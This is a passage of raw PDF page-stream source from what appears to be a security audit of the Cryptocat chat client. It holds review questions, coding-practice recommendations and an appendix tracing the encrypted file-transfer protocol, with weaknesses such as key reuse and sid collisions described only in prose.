Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (What happens if Alice begins receiving $FILE from Bob, then initiates a send to Bob?) 
Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 453.0236 cm Q q 1 0 0 1 62.69291 429.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .689982 Tw 12 TL /F4 10 Tf 0 0 0 rg (.position) Tj ( ) Tj (>) Tj ( ) Tj (.file.size ) Tj /F1 10 Tf (seems off-by-one \(if ) Tj /F4 10 Tf (position ) Tj /F1 10 Tf (= ) Tj /F4 10 Tf (.file.size ) Tj /F1 10 Tf (then the file has all) Tj T* 0 Tw (been sent already\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 423.0236 cm Q q 1 0 0 1 62.69291 375.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm .980751 Tw 12 TL /F1 10 Tf 0 0 0 rg (Why does it use ) Tj /F4 10 Tf (FileReader ) Tj /F1 10 Tf (and ) Tj /F4 10 Tf (readAsDataURL) Tj /F1 10 Tf (? This should be documented in a comment.) Tj T* 0 Tw 1.432619 Tw (\(My guess: the data is in a string of Unicode chars and needs to be converted to a sequence of) Tj T* 0 Tw 1.424985 Tw (bytes, and the Unicode-encoding way of doing it is inefficient on chunks this large.\) Why not use) Tj T* 0 Tw /F4 10 Tf (readAsArrayBuffer) Tj /F1 10 Tf (?) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 369.0236 cm Q q 1 0 0 1 62.69291 345.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .598221 Tw 12 TL /F4 10 Tf 0 0 0 rg (otr.js ) Tj /F1 10 Tf (ignores the ) Tj /F3 10 Tf (OTR TLV ) Tj /F1 10 Tf (type 8 4-byte type indicator and assumes it is a filename. This might) Tj T* 0 Tw (break compatibility with a future ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (standard.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 339.0236 cm Q q 1 0 0 1 62.69291 279.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm .633318 Tw 12 TL /F1 10 Tf 0 0 0 rg (Why are only certain types \() Tj /F3 10 Tf (MIME ) Tj /F1 10 Tf (types\) of files allowed? This should be documented, for example) Tj T* 0 Tw .64832 Tw (on a web page, wiki, or text file, and the code that enforces that restriction should have a comment) Tj T* 0 Tw 22.29442 Tw (saying where to find the documentation of it. Perhaps in) Tj T* 0 Tw 2.619921 Tw 0 0 .501961 rg (https://github.com/cryptocat/cryptocat/wiki/OTR-Encrypted-File-Transfer-Specification) Tj 0 0 0 rg (, or perhaps a) Tj T* 0 Tw (more user-focused manual.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 273.0236 cm Q q 1 0 0 1 62.69291 261.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 -3 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F4 10 Tf 0 0 0 rg (Cryptocat.fileSize ) Tj /F1 10 Tf (should be named ) Tj /F4 10 Tf (Cryptocat.maximumFileSize) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 255.0236 cm Q q 1 0 0 1 62.69291 207.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 33 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 38 Tm .958651 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (seq ) Tj /F1 10 Tf (parameter in the file-send protocol is maintained in the sender, received by the receiver,) Tj T* 0 Tw .578735 Tw (and stored by the receiver in the ) Tj /F4 10 Tf (rcvFile ) Tj /F1 10 Tf (structure, but is not actually used for anything. 
Remove) Tj T* 0 Tw 1.169431 Tw (all uses of it \(since ) Tj /F3 10 Tf (IBB ) Tj /F1 10 Tf (protocol requires a ) Tj /F4 10 Tf (seq ) Tj /F1 10 Tf (parameter to be sent in the ) Tj /F4 10 Tf (data ) Tj /F1 10 Tf (message, but) Tj T* 0 Tw /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (doesn't use that parameter, just hard-code it to 0\).) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 201.0236 cm Q q 1 0 0 1 62.69291 141.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 45 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm 1.475366 Tw 12 TL /F4 10 Tf 0 0 0 rg (strophe.js) Tj /F1 10 Tf ( ) Tj /F4 10 Tf (getUniqueId ) Tj /F1 10 Tf (is documented as resetting to 0 for each connection, but it actually) Tj T* 0 Tw 24.38747 Tw (resets to a random integer from [0,10000\). Opened ticket) Tj T* 0 Tw 2.965529 Tw 0 0 .501961 rg (https://github.com/strophe/strophejs/issues/35) Tj 0 0 0 rg (. The ticket was closed by the strophe authors by) Tj T* 0 Tw .55186 Tw (setting the ) Tj /F4 10 Tf (uniqueId ) Tj /F1 10 Tf (to 0. This affects ) Tj 0 0 .501961 rg (Issue C. Substitution of File Contents By Hijacking Entry in) Tj T* 0 Tw (User Interface) Tj 0 0 0 rg (.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 135.0236 cm Q q 1 0 0 1 62.69291 99.02362 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.409984 Tw 12 TL /F1 10 Tf 0 0 0 rg (As documented in ) Tj 0 0 .501961 rg (Appendix B: Work Log) Tj 0 0 0 rg (, we concluded that BOSH is resistant to CSRF attacks) Tj T* 0 Tw .247318 Tw (provided that the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (parameter is unguessable. Much later, we realized that the ) Tj /F4 10 Tf (sid ) Tj /F1 10 Tf (parameter is) Tj T* 0 Tw (not unguessable. Is there anything else protecting BOSH from CSRF attacks?) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 99.02362 cm Q q 1 0 0 1 62.69291 99.02362 cm Q endstream endobj % 'R197': class PDFStream 197 0 obj % page stream << /Length 7201 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Recommendations) Tj T* ET Q Q q 1 0 0 1 62.69291 714.0236 cm q BT 1 0 0 1 0 3 Tm 18 TL /F2 15 Tf 0 0 0 rg (Coding Practices) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm Q q 1 0 0 1 62.69291 702.0236 cm Q q 1 0 0 1 62.69291 600.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 62 Tm .892976 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (implementation guards against ) Tj /F3 10 Tf (XSS ) Tj /F1 10 Tf (attacks by storing potentially attacker-controlled) Tj T* 0 Tw 1.177633 Tw (data, such as nicknames, as strings and escaping them close to the point of use. This in practice) Tj T* 0 Tw 2.866905 Tw (results in escaping logic being scattered in many places over the source, including ) Tj /F3 10 Tf (Mustache) Tj T* 0 Tw .35104 Tw /F1 10 Tf (templates as part of the source; if any one of the necessary places is omitted, there may be an ) Tj /F3 10 Tf (XSS) Tj T* 0 Tw .029988 Tw /F1 10 Tf (vulnerability. If instead such data were held in an object that is not usable directly as a string, it would) Tj T* 0 Tw (be much easier to ensure consistent and auditable validation and escaping.) 
Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .449984 Tw 12 TL /F1 10 Tf 0 0 0 rg (\(In ) Tj /F3 10 Tf (JavaScript ) Tj /F1 10 Tf (all objects have implicit coercions to string; however, the implicit coercion may yield a) Tj T* 0 Tw (harmless constant, in which case it is not a security risk for it to be invoked accidentally.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 594.0236 cm Q q 1 0 0 1 62.69291 414.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 165 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 105 cm q BT 1 0 0 1 0 62 Tm .031098 Tw 12 TL /F1 10 Tf 0 0 0 rg (A common idiom in ) Tj /F3 10 Tf (Javascript ) Tj /F1 10 Tf (code is for a function to behave differently depending on the type of its) Tj T* 0 Tw 2.265318 Tw (arguments. This can make it harder for reviewers to correctly trace control flow \(as they might) Tj T* 0 Tw 1.707984 Tw (misinterpret or misremember which of the behaviors of the function will be executed in a certain) Tj T* 0 Tw 3.234597 Tw (case\), and can similarly lead developers to call the function incorrectly. Some of ) Tj /F3 10 Tf (Cryptocat) Tj /F1 10 Tf ('s) Tj T* 0 Tw .446651 Tw (dependent libraries use this idiom. We would recommend to the authors of ) Tj /F3 10 Tf (those ) Tj /F1 10 Tf (libraries to instead) Tj T* 0 Tw (write separate functions for each separate behavior.) Tj T* ET Q Q q 1 0 0 1 23 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (Examples:) Tj T* ET Q Q q 1 0 0 1 23 81 cm Q q 1 0 0 1 23 81 cm Q q 1 0 0 1 23 57 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.014418 Tw 12 TL /F4 10 Tf 0 0 0 rg (OTR.prototype._sendMsg ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (otr.js ) Tj /F1 10 Tf (\(from the otr.js codebase\), which does something) Tj T* 0 Tw (different if its second argument is true.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 23 51 cm Q q 1 0 0 1 23 27 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.136976 Tw 12 TL /F4 10 Tf 0 0 0 rg (OTR.prototype._sendMsg ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (otr.js ) Tj /F1 10 Tf (also does something different if its ) Tj /F4 10 Tf (msgstate ) Tj /F1 10 Tf (is) Tj T* 0 Tw /F4 10 Tf (CONST.MSGSTATE_PLAINTEXT) Tj /F1 10 Tf (.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 21 cm Q q 1 0 0 1 23 -3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 9 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.38247 Tw 12 TL /F4 10 Tf 0 0 0 rg (selectCipherStrategy\(\) ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (cipher-core.js ) Tj /F1 10 Tf (\(from the crypto-js codebase\) is scary,) Tj T* 0 Tw (because what it does depends on whether the type of its ) Tj /F4 10 Tf (key ) Tj /F1 10 Tf (argument is string or other.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 408.0236 cm Q q 1 0 0 1 62.69291 324.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 69 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 74 Tm 1.531235 Tw 12 TL /F1 10 Tf 0 0 0 rg (Cryptocat itself uses in one place a similar idiom, of returning different types of argument from a) Tj T* 0 Tw 3.190888 Tw (function in different cases. This is in ) Tj /F4 10 Tf (Cryptocat.getBytes\(\)) Tj /F1 10 Tf (, which returns different types) Tj T* 0 Tw 1.569398 Tw (depending on whether its first argument is 1 or a number greater than 1. 
As mentioned in ) Tj 0 0 .501961 rg (Open) Tj T* 0 Tw 2.593976 Tw (Questions & Concerns) Tj 0 0 0 rg (, ) Tj /F4 10 Tf (Cryptocat.encodedBytes\(\) ) Tj /F1 10 Tf (doesn't take into account the fact that) Tj T* 0 Tw 11.21098 Tw /F4 10 Tf (Cryptocat.getBytes\(\)) Tj /F1 10 Tf ('s return value is of varying type, so if you invoke) Tj T* 0 Tw 2.935976 Tw /F4 10 Tf (Cryptocat.encodedBytes\(1,) Tj ( ) Tj (\205\)) Tj /F1 10 Tf (, it will throw an exception. We recommend making each) Tj T* 0 Tw (function return the same type of object in all cases.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 318.0236 cm Q q 1 0 0 1 62.69291 282.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 5.139069 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (crypto-js ) Tj /F1 10 Tf (codebase makes heavy use of a ) Tj /F4 10 Tf (.extend ) Tj /F1 10 Tf (prototypical inheritance by) Tj T* 0 Tw .67784 Tw (copy-then-modify. Additionally it has a very deep abstraction hierarchy for only a few actual ciphers) Tj T* 0 Tw (and modes. These two styles make it extremely cumbersome to audit by source.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 276.0236 cm Q q 1 0 0 1 62.69291 240.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 10.5 0 Td (\177) Tj T* -10.5 0 Td ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.989398 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (key ) Tj /F1 10 Tf (structure which has two slots, 0, and 1, should instead be a struct with named slots.) Tj T* 0 Tw .303828 Tw (Recommendation: Use named properties rather than fixed Array indices \(tuple-style\), or if tuple style) Tj T* 0 Tw (has some advantage, define constants for the indices, rather than using magic constants.) 
Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 240.0236 cm Q q 1 0 0 1 62.69291 240.0236 cm Q endstream endobj % 'R198': class PDFStream 198 0 obj % page stream << /Length 9354 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 744.0236 cm q BT 1 0 0 1 0 3.5 Tm 21 TL /F2 17.5 Tf 0 0 0 rg (Appendix A: The life cycle of the Cryptocat file transfer) Tj T* ET Q Q q 1 0 0 1 62.69291 702.0236 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL 1.571318 Tw (Here are our notes describing our understanding of the Cryptocat file transfer protocol, along with the) Tj T* 0 Tw .968876 Tw (parts of the rest of the protocols that are necessary to evaluate the security of the file transfer protocol.) Tj T* 0 Tw (This is described in chronological order of one \(or more\) file transfers.) Tj T* ET Q Q q 1 0 0 1 62.69291 696.0236 cm Q q 1 0 0 1 62.69291 696.0236 cm Q q 1 0 0 1 62.69291 642.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (1.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL (The server tells a client there is a Presence session, with a Nickname.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm .377633 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note: there is no attempt to enforce constraints on what Nickname gets used, other than that it can't) Tj T* 0 Tw 1.734104 Tw (be currently in use \(see ) Tj 0 0 .501961 rg (Issue E. You Log Out, Attacker Logs in with the same Nickname, Your) Tj T* 0 Tw (Friend Thinks The Attacker is You) Tj 0 0 0 rg (\).) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 636.0236 cm Q q 1 0 0 1 62.69291 540.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 81 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (2.) 
Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 69 cm q BT 1 0 0 1 0 14 Tm .670651 Tw 12 TL /F1 10 Tf 0 0 0 rg (Now the server can deliver messages between clients, which ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (uses to do its protocol, resulting) Tj T* 0 Tw (in a ) Tj /F3 10 Tf (Diffie-Hellman ) Tj /F1 10 Tf (shared secret.) Tj T* ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 26 Tm .557126 Tw 12 TL /F1 10 Tf 0 0 0 rg (Note: if the user does not perform the optional Socialist Millionaire Protocol authentication, then this) Tj T* 0 Tw 1.25186 Tw (is vulnerable to a Man-In-The-Middle attack \(see ) Tj 0 0 .501961 rg (Issue E. You Log Out, Attacker Logs in with the) Tj T* 0 Tw (same Nickname, Your Friend Thinks The Attacker is You) Tj 0 0 0 rg (\).) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 2.878735 Tw 12 TL /F1 10 Tf 0 0 0 rg (The resulting ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (keys are stored in an ) Tj /F4 10 Tf (OTR ) Tj /F1 10 Tf (object, which is stored in a hashtable named) Tj T* 0 Tw /F4 10 Tf (otrKeys) Tj /F1 10 Tf (, indexed by the Nickname.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 534.0236 cm Q q 1 0 0 1 62.69291 432.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (3.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 63 cm q BT 1 0 0 1 0 26 Tm 1.50436 Tw 12 TL /F3 10 Tf 0 0 0 rg (OTR ) Tj /F1 10 Tf (generates a new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared secret "on every round trip" \(see below for precisely what that) Tj T* 0 Tw .649987 Tw (means\). After it generates a new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared secret, it begins using it to protect all messages that it) Tj T* 0 Tw (sends from that time on.) 
Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 50 Tm .254987 Tw 12 TL /F1 10 Tf 0 0 0 rg ("On every round trip" means: after a new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared secret is generated, then the next ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (Data) Tj T* 0 Tw 1.781318 Tw (Message sent will contain an advertisement of a new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (public key. After that advertisement is) Tj T* 0 Tw 2.987485 Tw (received by the peer, then the next ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (Data Message that the peer sends will contain an) Tj T* 0 Tw .55784 Tw (acknowledgement of his receipt of that new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (public key. Once that acknowledgement is received) Tj T* 0 Tw (by the first party, it will begin using the new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (public key which will result in a new ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared secret.) Tj T* ET Q Q q Q Q q 1 0 0 1 62.69291 426.0236 cm Q q 1 0 0 1 62.69291 114.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 297 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (4.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 285 cm q BT 1 0 0 1 0 14 Tm 4.039318 Tw 12 TL /F1 10 Tf 0 0 0 rg (Whenever a client initiates a file send, then all the following things happen \(in order and) Tj T* 0 Tw (synchronously\) in the ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (client on the file transmitter side:) Tj T* ET Q Q q 1 0 0 1 23 279 cm Q q 1 0 0 1 23 279 cm Q q 1 0 0 1 23 243 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 21 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (a.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 -3 cm q 0 0 0 rg BT 1 0 0 1 0 26 Tm /F1 10 Tf 12 TL .39998 Tw (The file transmitter generates a random 128-bit number encoded in hexadecimal, and appends) Tj T* 0 Tw 1.18186 Tw (the file's extension. We'll call this the "file identifier", although in the source code it is usually) Tj T* 0 Tw (called the "filename".)
Tj T* ET Q Q q Q Q q 1 0 0 1 23 237 cm Q q 1 0 0 1 23 171 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 51 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (b.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 15 cm q BT 1 0 0 1 0 38 Tm 1.655697 Tw 12 TL /F1 10 Tf 0 0 0 rg (The ) Tj /F4 10 Tf (OTR ) Tj /F1 10 Tf (object sends the file identifier \(called a "filename" in this protocol\), encrypted and) Tj T* 0 Tw .798443 Tw (authenticated, through ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (\(using the current ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared secret\), and calls back to ) Tj /F3 10 Tf (Cryptocat) Tj T* 0 Tw 2.149318 Tw /F1 10 Tf (to deliver an "extra symmetric key" \(which is derived by ) Tj /F3 10 Tf (OTR ) Tj /F1 10 Tf (from the current ) Tj /F3 10 Tf (DH ) Tj /F1 10 Tf (shared) Tj T* 0 Tw (secret\).) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 2 Tm 12 TL /F1 10 Tf 0 0 0 rg (\(See the call to ) Tj /F4 10 Tf (on\('file',) Tj ( ) Tj (\205\) ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (handlePresence ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (cryptocat.js) Tj /F1 10 Tf (.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 23 165 cm Q q 1 0 0 1 23 63 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 87 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 6.22 0 Td (c.) Tj T* -6.22 0 Td ET Q Q q 1 0 0 1 23 39 cm q BT 1 0 0 1 0 50 Tm .768651 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter diversifies the extra symmetric key into an encryption key and a ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key,) Tj T* 0 Tw .611318 Tw (and stores the pair of keys \(encryption key and ) Tj /F3 10 Tf (MAC ) Tj /F1 10 Tf (key\) in the hashtable named ) Tj /F4 10 Tf (fileKeys) Tj T* 0 Tw .084104 Tw /F1 10 Tf (under the index of the nickname of the intended file-receiver and then under the index of the file) Tj T* 0 Tw .932126 Tw (identifier: i.e. 
if the source code used this terminology, the indexing into ) Tj /F4 10 Tf (fileKeys ) Tj /F1 10 Tf (would be) Tj T* 0 Tw (written ) Tj /F4 10 Tf (fileKeys[receiversNick][fileIdentifier]) Tj /F1 10 Tf (.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 26 Tm 1.099984 Tw 12 TL /F1 10 Tf 0 0 0 rg (N.B. The same ) Tj /F3 10 Tf (OTR) Tj /F1 10 Tf (-generated key can be used for multiple file transfers here \(see ) Tj 0 0 .501961 rg (Issue A.) Tj T* 0 Tw 1.394104 Tw (Disclosure of File Contents Due to Re-use Of Key and IV ) Tj 0 0 0 rg (and ) Tj 0 0 .501961 rg (Issue B. Integrity Key and IV) Tj T* 0 Tw (Reuse in File Transfer) Tj 0 0 0 rg (\).) Tj T* ET Q Q q Q Q q 1 0 0 1 23 57 cm Q q 1 0 0 1 23 3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 39 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (d.) Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 27 cm q BT 1 0 0 1 0 14 Tm .675318 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter then generates an ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (, which is guaranteed to be unique within the scope) Tj T* 0 Tw (of that ) Tj /F3 10 Tf (Cryptocat ) Tj /F1 10 Tf (client's current connection to the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (server.) Tj T* ET Q Q q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm .196905 Tw 12 TL /F1 10 Tf 0 0 0 rg (N.B. If the client disconnects and reconnects to the ) Tj /F3 10 Tf (XMPP ) Tj /F1 10 Tf (server, then subsequently generated) Tj T* 0 Tw (sids could collide.) Tj T* ET Q Q q Q Q q 1 0 0 1 23 -3 cm Q q Q Q q 1 0 0 1 62.69291 76.86614 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 24.15748 Tm T* ET q 1 0 0 1 23 3 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET q 1 0 0 1 6 16.15748 cm q 0 0 0 rg BT 1 0 0 1 0 2 Tm /F1 10 Tf 12 TL 5.66 0 Td (e.) 
Tj T* -5.66 0 Td ET Q Q q 1 0 0 1 23 4.15748 cm q BT 1 0 0 1 0 14 Tm .625984 Tw 12 TL /F1 10 Tf 0 0 0 rg (The file transmitter stores the filehandle \(giving access to the file on the local filesystem\), the ) Tj T* 0 Tw .071412 Tw (nickname of the receiver, the encryption and authentication keys, and a counter in a hashtable) Tj T* 0 Tw ET Q Q q Q Q q Q Q endstream endobj % 'R199': class PDFStream 199 0 obj % page stream << /Length 9601 >> stream 1 0 0 1 0 0 cm BT /F1 12 Tf 14.4 TL ET q 1 0 0 1 62.69291 615.0236 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 137 Tm T* ET q 1 0 0 1 23 123 cm 0 0 0 rg BT /F1 10 Tf 12 TL ET BT 1 0 0 1 6 11 Tm T* ET q 1 0 0 1 23 -3 cm q BT 1 0 0 1 0 14 Tm 16.98997 Tw 12 TL /F1 10 Tf 0 0 0 rg (named ) Tj /F4 10 Tf (files ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (, indexed by the ) Tj /F4 10 Tf (sid) Tj /F1 10 Tf (. \(See) Tj T* 0 Tw /F4 10 Tf (Cryptocat.beginSendFile ) Tj /F1 10 Tf (in ) Tj /F4 10 Tf (fileTransfer.js) Tj /F1 10 Tf (.\)) Tj T* ET Q Q q Q Q q 1 0 0 1 23 117 cm Q q 1 0 0 1 23 15 cm 0 0 0 